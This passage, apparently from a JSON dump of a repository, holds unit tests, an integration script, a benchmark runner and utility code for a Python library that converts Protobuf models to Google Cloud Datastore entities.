example_pb2.ExampleEnumModel.ENUM2 # type: ignore\n # Enum with value 0 is explicitly provided\n example_placeholder_pb2 = example_pb2.ExampleNestedModel(string_key=u'value 2',\n int32_key=5000)\n example_placeholder_pb2.enum_key = example_pb2.ExampleEnumModel.ENUM0 # type: ignore\n # Enum value is not provided, default value 0 should be used\n example_placeholder_pb3 = example_pb2.ExampleNestedModel(string_key=u'value 3',\n int32_key=40)\n\n example_pb.complex_array_key.append(example_placeholder_pb1) # type: ignore\n example_pb.complex_array_key.append(example_placeholder_pb2) # type: ignore\n example_pb.complex_array_key.append(example_placeholder_pb3) # type: ignore\n\n self.assertEqual(example_pb.complex_array_key[0].enum_key, 2)\n self.assertEqual(example_pb.complex_array_key[1].enum_key, 0)\n self.assertEqual(example_pb.complex_array_key[2].enum_key, 0)\n\n # Serialize it and ensure \"0\" enum values are included\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n self.assertEqual(len(entity_pb.properties['complex_array_key'].array_value.values), 3)\n self.assertEqual(entity_pb.properties['complex_array_key'].array_value.values[0]\n .entity_value.properties['enum_key'].integer_value,\n example_pb2.ExampleEnumModel.ENUM2)\n self.assertEqual(entity_pb.properties['complex_array_key'].array_value.values[1]\n .entity_value.properties['enum_key'].integer_value,\n example_pb2.ExampleEnumModel.ENUM0)\n self.assertEqual(entity_pb.properties['complex_array_key'].array_value.values[2]\n .entity_value.properties['enum_key'].integer_value,\n example_pb2.ExampleEnumModel.ENUM0)\n\n def test_model_pb_to_entity_pb_exclude_from_index_fields(self):\n # type: () -> None\n example_pb = example_pb2.ExampleDBModel()\n example_pb.int32_key = 100\n example_pb.string_key = 'string bar'\n example_pb.bytes_key = b'foobarbytes'\n example_pb.enum_key = 1 # type: ignore\n\n # No exclude from index provided\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n for field_name in ['int32_key', 'string_key', 'bytes_key', 'enum_key']:\n self.assertFalse(entity_pb.properties[field_name].exclude_from_indexes)\n\n # Exclude from index provided for some fields\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb,\n exclude_from_index=['int32_key', 'bytes_key'])\n\n for field_name in ['int32_key', 'bytes_key']:\n self.assertTrue(entity_pb.properties[field_name].exclude_from_indexes)\n\n for field_name in ['string_key', 'enum_key']:\n self.assertFalse(entity_pb.properties[field_name].exclude_from_indexes)\n\n def test_model_pb_to_entity_pb_struct_field_null_value(self):\n example_pb = example_pb2.ExampleDBModel()\n example_pb.struct_key.update({\n 'key1': None,\n 'key2': [None, None],\n 'key3': {'a': None}\n })\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n self.assertEqual(entity_pb.properties['struct_key'].entity_value\n .properties['key1'].null_value, struct_pb2.NULL_VALUE)\n self.assertEqual(entity_pb.properties['struct_key'].entity_value.\n properties['key2'].array_value.values[0].null_value,\n struct_pb2.NULL_VALUE)\n self.assertEqual(entity_pb.properties['struct_key'].entity_value.\n properties['key2'].array_value.values[1].null_value,\n struct_pb2.NULL_VALUE)\n self.assertEqual(entity_pb.properties['struct_key'].entity_value.\n properties['key3'].entity_value.properties['a'].null_value,\n struct_pb2.NULL_VALUE)\n\n def test_model_pb_to_entity_pb_exclude_from_index_custom_extension_model_without_package(self):\n # type: () -> None\n from tests.generated import example_with_options_pb2\n\n # Multiple fields excluded from index\n model_pb1 = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb1.string_key_one = 'one'\n model_pb1.string_key_two = 'two'\n model_pb1.string_key_three = 'three'\n model_pb1.string_key_four = 'four'\n model_pb1.int32_field_one = 111\n model_pb1.int32_field_two = 222\n\n entity_pb1 = model_pb_to_entity_pb(model_pb=model_pb1)\n\n self.assertEqual(entity_pb1.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb1.properties['string_key_one'].exclude_from_indexes, True)\n self.assertEqual(entity_pb1.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb1.properties['string_key_three'].exclude_from_indexes, True)\n self.assertEqual(entity_pb1.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb1.properties['int32_field_two'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb1.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb1.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb1.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb1.properties['int32_field_one'].exclude_from_indexes, False)\n\n # One field excluded from index, other doesn't exist (should be simply ignored)\n model_pb2 = example_with_options_pb2.ExampleDBModelWithOptions2()\n model_pb2.string_key_one = 'one'\n model_pb2.string_key_two = 'two'\n model_pb2.string_key_three = 'three'\n model_pb2.string_key_four = 'four'\n model_pb2.int32_field_one = 111\n model_pb2.int32_field_two = 222\n\n entity_pb2 = model_pb_to_entity_pb(model_pb=model_pb2)\n\n self.assertEqual(entity_pb2.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb2.properties['int32_field_two'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb2.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb2.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb2.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb2.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb2.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb2.properties['int32_field_one'].exclude_from_indexes, False)\n\n # No fields excluded from index\n model_pb3 = example_with_options_pb2.ExampleDBModelWithOptions3()\n model_pb3.string_key_one = 'one'\n model_pb3.string_key_two = 'two'\n model_pb3.string_key_three = 'three'\n model_pb3.string_key_four = 'four'\n model_pb3.int32_field_one = 111\n model_pb3.int32_field_two = 222\n\n entity_pb3 = model_pb_to_entity_pb(model_pb=model_pb3)\n\n self.assertEqual(entity_pb3.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb3.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb3.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb3.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb3.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb3.properties['int32_field_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb3.properties['int32_field_two'].exclude_from_indexes, False)\n\n # exclude_from_index function argument provided, this has precedence over fields defined on\n # the model\n # Multiple fields excluded from index\n model_pb4 = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb4.string_key_one = 'one'\n model_pb4.string_key_two = 'two'\n model_pb4.string_key_three = 'three'\n model_pb4.string_key_four = 'four'\n model_pb4.int32_field_one = 111\n model_pb4.int32_field_two = 222\n\n entity_pb4 = model_pb_to_entity_pb(model_pb=model_pb4,\n exclude_from_index=['string_key_four'])\n\n self.assertEqual(entity_pb4.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb4.properties['string_key_four'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb4.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb4.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb4.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb4.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb4.properties['int32_field_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb4.properties['int32_field_two'].exclude_from_indexes, False)\n\n def test_model_pb_to_entity_pb_exclude_from_index_custom_extension_model_with_package(self):\n # type: () -> None\n from tests.generated.models import example_with_options_pb2\n\n # Verify it also works correctly for model protobuf files which define \"package\" option\n # Multiple fields excluded from index\n model_pb1 = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb1.string_key_one = 'one'\n model_pb1.string_key_two = 'two'\n model_pb1.string_key_three = 'three'\n model_pb1.string_key_four = 'four'\n model_pb1.int32_field_one = 111\n model_pb1.int32_field_two = 222\n\n entity_pb1 = model_pb_to_entity_pb(model_pb=model_pb1)\n\n self.assertEqual(entity_pb1.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb1.properties['string_key_one'].exclude_from_indexes, True)\n self.assertEqual(entity_pb1.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb1.properties['string_key_three'].exclude_from_indexes, True)\n self.assertEqual(entity_pb1.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb1.properties['int32_field_two'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb1.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb1.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb1.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb1.properties['int32_field_one'].exclude_from_indexes, False)\n\n # One field excluded from index, other doesn't exist (should be simply ignored)\n model_pb2 = example_with_options_pb2.ExampleDBModelWithOptions2()\n model_pb2.string_key_one = 'one'\n model_pb2.string_key_two = 'two'\n model_pb2.string_key_three = 'three'\n model_pb2.string_key_four = 'four'\n model_pb2.int32_field_one = 111\n model_pb2.int32_field_two = 222\n\n entity_pb2 = model_pb_to_entity_pb(model_pb=model_pb2)\n\n self.assertEqual(entity_pb2.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb2.properties['int32_field_two'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb2.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb2.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb2.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb2.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb2.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb2.properties['int32_field_one'].exclude_from_indexes, False)\n\n # No fields excluded from index\n model_pb3 = example_with_options_pb2.ExampleDBModelWithOptions3()\n model_pb3.string_key_one = 'one'\n model_pb3.string_key_two = 'two'\n model_pb3.string_key_three = 'three'\n model_pb3.string_key_four = 'four'\n model_pb3.int32_field_one = 111\n model_pb3.int32_field_two = 222\n\n entity_pb3 = model_pb_to_entity_pb(model_pb=model_pb3)\n\n self.assertEqual(entity_pb3.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb3.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb3.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb3.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb3.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb3.properties['int32_field_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb3.properties['int32_field_two'].exclude_from_indexes, False)\n\n # exclude_from_index function argument provided, this has precedence over fields defined on\n # the model\n # Multiple fields excluded from index\n model_pb4 = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb4.string_key_one = 'one'\n model_pb4.string_key_two = 'two'\n model_pb4.string_key_three = 'three'\n model_pb4.string_key_four = 'four'\n model_pb4.int32_field_one = 111\n model_pb4.int32_field_two = 222\n\n entity_pb4 = model_pb_to_entity_pb(model_pb=model_pb4,\n exclude_from_index=['string_key_four'])\n\n self.assertEqual(entity_pb4.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb4.properties['string_key_four'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb4.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb4.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb4.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb4.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb4.properties['int32_field_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb4.properties['int32_field_two'].exclude_from_indexes, False)\n\n def test_model_pb_to_entity_pb_exclude_from_index_custom_extension_multiple_options(self):\n # type: () -> None\n # Test a scenario where field has another custom option defined, in addition to\n # exclude_from_index (other option should be simply ignored and not affect the behavior\n # in any way)\n from tests.generated import example_with_options_pb2\n\n # Multiple fields excluded from index\n model_pb1 = example_with_options_pb2.ExampleDBModelWithMultipleOptions()\n model_pb1.string_key_one = 'one'\n model_pb1.string_key_two = 'two'\n model_pb1.string_key_three = 'three'\n model_pb1.string_key_four = 'four'\n model_pb1.int32_field_one = 111\n model_pb1.int32_field_two = 222\n\n entity_pb1 = model_pb_to_entity_pb(model_pb=model_pb1)\n\n self.assertEqual(entity_pb1.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb1.properties['string_key_one'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb1.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb1.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb1.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb1.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb1.properties['int32_field_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb1.properties['int32_field_two'].exclude_from_indexes, False)\n\n def test_model_pb_to_entity_pb_repeated_struct_type(self):\n struct1_pb = struct_pb2.Struct()\n struct1_pb.update({\n 'key1': 'struct 1',\n 'key2': 111\n })\n struct2_pb = struct_pb2.Struct()\n struct2_pb.update({\n 'key4': 'struct 2',\n 'key5': 222\n })\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.struct_array_key.append(struct1_pb)\n example_pb.struct_array_key.append(struct2_pb)\n\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n self.assertEqual(len(entity_pb.properties['struct_array_key'].array_value.values), 2)\n self.assertEqual(\n entity_pb.properties['struct_array_key'].array_value.values[0]\n .entity_value.properties['key1'].string_value,\n 'struct 1')\n self.assertEqual(\n entity_pb.properties['struct_array_key'].array_value.values[0]\n .entity_value.properties['key2'].double_value,\n 111)\n self.assertEqual(\n entity_pb.properties['struct_array_key'].array_value.values[1]\n .entity_value.properties['key4'].string_value,\n 'struct 2')\n self.assertEqual(\n entity_pb.properties['struct_array_key'].array_value.values[1]\n .entity_value.properties['key5'].double_value,\n 222)\n\n def test_entity_pb_to_model_pb_repeated_struct_field_type(self):\n struct1_pb = struct_pb2.Struct()\n struct1_pb.update({\n 'key1': 'struct 1',\n 'key2': 111,\n 'key3': [1, 2, 3],\n 'key4': {\n 'a': 1\n }\n })\n struct2_pb = struct_pb2.Struct()\n struct2_pb.update({\n 'key5': 'struct 2',\n 'key6': 222,\n 'key7': [4, 5, 6],\n 'key8': {\n 'b': 2\n }\n })\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.struct_array_key.append(struct1_pb)\n example_pb.struct_array_key.append(struct2_pb)\n\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n model_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n self.assertEqual(model_pb, example_pb)\n\n def test_model_pb_to_entity_pb_nested_struct_empty_array(self):\n struct1_pb = struct_pb2.Struct()\n struct1_pb.update({\n 'a': {\n 'a': [],\n 'b': {\n 'c': []\n }\n },\n 'b': []\n })\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.struct_key.CopyFrom(struct1_pb)\n\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n self.assertEqual(\n entity_pb.properties['struct_key']\n .entity_value.properties['a']\n .entity_value.properties['b']\n .entity_value.properties['c'].array_value,\n entity_pb2.ArrayValue(values=[]))\n\n self.assertEqual(\n entity_pb.properties['struct_key']\n .entity_value.properties['b'].array_value,\n entity_pb2.ArrayValue(values=[]))\n\n self.assertEqual(\n entity_pb.properties['struct_key']\n .entity_value.properties['a']\n .entity_value.properties['a'].array_value,\n entity_pb2.ArrayValue(values=[]))\n\n def assertEntityPbHasPopulatedField(self, entity_pb, field_name):\n # type: (entity_pb2.Entity, str) -> None\n \"\"\"\n Assert that the provided Entity protobuf object only has a single field which is provided\n set (aka that field contains a non-falsy value)>\n \"\"\"\n entity = datastore.helpers.entity_from_protobuf(entity_pb)\n entity = dict(entity)\n\n self.assertEqual(len(entity.keys()), 1, 'Provided entity has more than 1 field populated')\n self.assertTrue(field_name in entity.keys(), '%s field is not populated' % (field_name))\n\n def _int_to_double(self, value):\n \"\"\"\n Function which converts any int value type to double to work around issue with\n \"entity_to_protobuf\" function which handles all the nested values as embedded entities and\n not structs which only support double type.\n \"\"\"\n if isinstance(value, list):\n value = [self._int_to_double(item) for item in value]\n elif isinstance(value, dict):\n result = {}\n for dict_key, dict_value in value.items():\n result[dict_key] = self._int_to_double(dict_value)\n\n return result\n elif isinstance(value, bool):\n value = bool(value)\n elif isinstance(value, int):\n value = float(value)\n\n return value\n" }, { "alpha_fraction": 0.6731477975845337, "alphanum_fraction": 0.6774457693099976, "avg_line_length": 31.573333740234375, "blob_id": "27eb788f59dd734c78f0e703957863eccb271942", "content_id": "10375b44ec2b097ab56b3b1687252fe5ec93b866", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4886, "license_type": "permissive", "max_line_length": 97, "num_lines": 150, "path": "/tests/integration/python/python-put-get-db-model.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport logging\nimport argparse\n\nimport requests\nfrom google.cloud import datastore\nfrom google.protobuf import json_format\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\nfrom protobuf_cloud_datastore_translator.utils import get_module_and_class_for_model_name\n\nfrom tests.mocks import EmulatorCreds # type: ignore\n\n__all__ = [\n 'get_db_model',\n 'insert_db_model'\n]\n\nLOG = logging.getLogger()\nLOG.setLevel(logging.DEBUG)\n\nhandler = logging.StreamHandler(sys.stderr)\nhandler.setLevel(logging.DEBUG)\n\nLOG.addHandler(handler)\n\nMODEL_NAME = 'compat.example_compat_pb2.ExampleCompatDBModel'\n\n\ndef get_db_model(model_name, primary_key):\n # type: (str, str) -> bool\n module, model_class = get_module_and_class_for_model_name(model_name)\n\n # 1. Retrieve model from datastore\n if os.environ.get('DATASTORE_EMULATOR_HOST'):\n client = datastore.Client(credentials=EmulatorCreds(), _http=requests.Session())\n else:\n client = datastore.Client()\n\n model_name = model_name.split('.')[-1]\n key = client.key(model_name, primary_key)\n\n # 2. Convert it into our model pb and JSON serialize it\n LOG.debug('Retrieving model with primary key \"%s\" from database' % (key))\n entity = client.get(key)\n\n if not entity:\n raise ValueError('Entity with key \"%s\" not found' % (key))\n\n entity_pb = datastore.helpers.entity_to_protobuf(entity)\n\n LOG.debug('Converting it from Entity PB to DB model PB')\n\n model_pb = entity_pb_to_model_pb(model_class, entity_pb)\n\n LOG.debug('Serializing Protobuf model as JSON')\n\n model_pb_json = json_format.MessageToJson(\n model_pb, preserving_proto_field_name=True, including_default_value_fields=True\n )\n print(model_pb_json)\n\n return True\n\n\ndef insert_db_model(fixture_path, model_name, primary_key):\n # type: (str, str, str) -> bool\n LOG.debug('Loading fixture from \"%s\"', fixture_path)\n\n # 1. Load in JSON fixture\n with open(fixture_path, 'r') as fp:\n model_pb_json = fp.read()\n\n # 2. Parse it in our custom Protobuf DB model type\n module, model_class = get_module_and_class_for_model_name(model_name)\n\n LOG.debug('Parsing JSON fixture as Protobuf message')\n model_pb = json_format.Parse(model_pb_json, model_class())\n\n # 3. Translate it into Entity PB\n LOG.debug('Translating Protobuf PB to Entity PB')\n entity_pb = model_pb_to_entity_pb(model_pb)\n\n # 4. Store it in Datastore\n if os.environ.get('DATASTORE_EMULATOR_HOST'):\n client = datastore.Client(credentials=EmulatorCreds(), _http=requests.Session())\n else:\n client = datastore.Client()\n\n model_name = model_pb.DESCRIPTOR.name\n key = client.key(model_name, primary_key)\n key_pb = key.to_protobuf()\n entity_pb.key.CopyFrom(key_pb) # pylint: disable=no-member\n\n LOG.debug('Storing it in datastore under primary key \"%s\"', key)\n\n entity_pb = entity = datastore.helpers.entity_from_protobuf(entity_pb)\n client.put(entity)\n return True\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Get / Insert model DB fixture from / to a '\n 'datastore')\n parser.add_argument(\n '--fixture-path', action='store', required=False, help=('Path to the JSON fixture file.')\n )\n parser.add_argument(\n '--operation', action='store', required=True, help=(\n 'Operation name - get / put'\n )\n )\n parser.add_argument(\n '--primary-key', action='store', required=True,\n help=('Primary key to use when writting entity to the datastore.')\n )\n\n args = parser.parse_args()\n\n if args.operation not in ['get', 'put']:\n raise ValueError('Invalid operation: %s' % (args.operation))\n\n if args.operation == 'get':\n get_db_model(model_name=MODEL_NAME, primary_key=args.primary_key)\n elif args.operation == 'put':\n if not args.fixture_path:\n raise ValueError('--fixture-path argument not provided')\n\n insert_db_model(\n fixture_path=args.fixture_path, model_name=MODEL_NAME, primary_key=args.primary_key\n )\n" }, { "alpha_fraction": 0.731686532497406, "alphanum_fraction": 0.7444633841514587, "avg_line_length": 38.13333511352539, "blob_id": "bda2052161f9e61c9f403da4b7827ae1dc791b37", "content_id": "39bf015004c1c19df4ad57130fdeaef0576102cf", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1174, "license_type": "permissive", "max_line_length": 115, "num_lines": 30, "path": "/scripts/run-benchmarks.sh", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n#Script which runs py.test benchmarks and also compares results to previous run (if previous run\n# exists)\n\nOUTPUT=$(ls -la .benchmarks)\nEXIT_CODE=$?\n\nif [ ${EXIT_CODE} -ne 0 ]; then\n # Previous run doesn't exist yet, create one so we have something to compare against during\n # the next run\n echo \"Previous run doesn't exist, skipping compare...\"\n exec py.test --benchmark-autosave tests/test_benchmarks.py\nelse\n exec py.test --benchmark-autosave --benchmark-compare --benchmark-compare-fail=min:14% tests/test_benchmarks.py\nfi\n" }, { "alpha_fraction": 0.6761219501495361, "alphanum_fraction": 0.6824724674224854, "avg_line_length": 31.356164932250977, "blob_id": "81cd584221f73c20f9d6522e0a36551d25c95db1", "content_id": "8ffa817a2b04005114fb205d727b223b7381cb09", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2362, "license_type": "permissive", "max_line_length": 92, "num_lines": 73, "path": "/protobuf_cloud_datastore_translator/utils.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport importlib\n\nfrom typing import Type\nfrom typing import List\nfrom typing import Tuple\nfrom types import ModuleType\n\nfrom google.protobuf.pyext.cpp_message import GeneratedProtocolMessageType\n\nfrom protobuf_cloud_datastore_translator.translator import exclude_field_from_index\n\n\n__all__ = [\n 'get_module_and_class_for_model_name',\n 'get_exclude_from_index_fields_for_model'\n]\n\n\ndef get_module_and_class_for_model_name(model_name):\n # type: (str) -> Tuple[ModuleType, Type[GeneratedProtocolMessageType]]\n split = model_name.rsplit('.', 1)\n\n if len(split) != 2:\n raise ValueError('Invalid module name: %s' % (model_name))\n\n module_path, class_name = split\n\n try:\n module = importlib.import_module(module_path)\n model_class = getattr(module, class_name, None)\n except Exception as e:\n raise ValueError('Class \"%s\" not found: %s. Make sure \"%s\" is in PYTHONPATH' %\n (model_name, module_path, str(e)))\n\n if not model_class:\n raise ValueError('Class \"%s\" not found in module \"%s\"' % (model_name, module_path))\n\n return module, model_class\n\n\ndef get_exclude_from_index_fields_for_model(model_class):\n # type: (Type[GeneratedProtocolMessageType]) -> List[str]\n \"\"\"\n Return a list of fields which are marked as to be excluded for the provided model class.\n \"\"\"\n\n fields = list(iter(model_class.DESCRIPTOR.fields))\n\n result = []\n for field_descriptor in fields:\n exclude_from_index = exclude_field_from_index(model=model_class,\n field_descriptor=field_descriptor)\n\n if exclude_from_index:\n result.append(field_descriptor.name)\n\n return result\n" }, { "alpha_fraction": 0.6223583221435547, "alphanum_fraction": 0.6355283260345459, "avg_line_length": 34.879119873046875, "blob_id": "c53a17397384d1292ec790471dcf450226e01eb2", "content_id": "4010de031eac63e079cbc0239a860386ba3d8ac6", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3265, "license_type": "permissive", "max_line_length": 99, "num_lines": 91, "path": "/tests/integration/base.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport time\nimport unittest\n\nimport requests\nfrom google.cloud import datastore\n\nfrom tests.mocks import EmulatorCreds\n\n__all__ = [\n 'BaseDatastoreIntegrationTestCase'\n]\n\nSTART_EMULATOR_STRING = \"\"\"\ngcloud beta emulators datastore start --host-port=127.0.0.1:8081 --no-store-on-disk --consistency=1\n\"\"\".strip()\n\n\nclass BaseDatastoreIntegrationTestCase(unittest.TestCase):\n\n def setUp(self):\n # type: () -> None\n super(BaseDatastoreIntegrationTestCase, self).setUp()\n\n # Set environment variables which are needed for emulator to work\n os.environ['DATASTORE_DATASET'] = 'translator-tests'\n 